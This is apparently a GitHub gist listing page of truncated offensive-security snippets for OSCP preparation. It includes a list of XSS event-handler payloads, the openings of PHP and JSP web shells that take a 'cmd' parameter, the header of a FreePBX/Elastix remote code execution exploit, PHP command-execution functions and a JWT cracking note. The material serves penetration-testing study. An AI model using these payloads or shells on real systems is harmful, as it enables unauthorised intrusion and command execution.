- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
Juan Pablo Perata cxzero
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var url = "Hello World"; | |
| var data = []; | |
| for (var i = 0; i < url.length; i++){ | |
| data.push(url.charCodeAt(i)); | |
| } |
unfo
/ how-to-oscp-final.md
Last active
February 26, 2024 08:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
joswr1ght
/ easy-simple-php-webshell.php
Last active
July 5, 2024 14:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if(isset($_GET['cmd'])) | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ page import="java.util.*,java.io.*"%> | |
| <% | |
| %> | |
| <HTML><BODY> | |
| Commands with JSP | |
| <FORM METHOD="GET" NAME="myform" ACTION=""> | |
| <INPUT TYPE="text" NAME="cmd"> | |
| <INPUT TYPE="submit" VALUE="Send"> | |
| </FORM> | |
| <pre> |
thel3l
/ 18650-fixed.py
Created
June 2, 2018 11:31
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution - Fixed to avoid SSL errors.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| ############################################################ | |
| # Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit | |
| # Google Dork: oy vey | |
| # Date: March 23rd, 2012 | |
| # Author: muts | |
| # Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. | |
| # Tested on: multiple | |
| # CVE : notyet | |
| # Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/ |
exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
pich4ya
/ crack_jwt.txt
Last active
June 19, 2023 16:13
Crack JWT (HMAC) with HashCat/JohnTheRipper on MacOS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Target: | |
| { | |
| "alg": "HS256", | |
| "typ": "JWT" | |
| } | |
| { | |
| "sub": "1234567890", | |
| "name": "John Doe", | |
| "iat": 1516239022 |
s4vitar
/ Preparación OSCP.md
Last active
July 19, 2024 20:11
prachauthit
/ ippsec-tmux
Last active
September 26, 2023 18:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # create or add this to ur ~/.tmux.conf | |
| #set prefix | |
| set -g prefix C-a | |
| bind C-a send-prefix | |
| unbind C-b | |
| set -g history-limit 100000 | |
| set -g allow-rename off |
OlderNewer